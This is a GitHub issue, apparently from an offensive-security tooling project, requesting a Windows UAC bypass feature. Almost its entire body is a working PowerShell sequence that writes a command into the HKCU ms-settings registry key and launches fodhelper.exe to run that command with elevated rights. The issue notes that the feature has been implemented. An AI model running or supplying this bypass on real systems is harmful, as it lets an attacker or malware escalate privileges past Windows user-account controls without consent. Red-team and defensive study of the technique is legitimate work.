mttaggart/OffensiveNotion

[New Feature] Fodhelper windows UAC bypass/elevate

HuskyHacks opened this issue · 1 comments

#Registry Command Edit

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value [injection] -Force

#Bypass Execution
Start-Process "C:\Windows\System32\fodhelper.exe"

Implemented in HuskyHacks@d0a6d56 (CC: @dievus )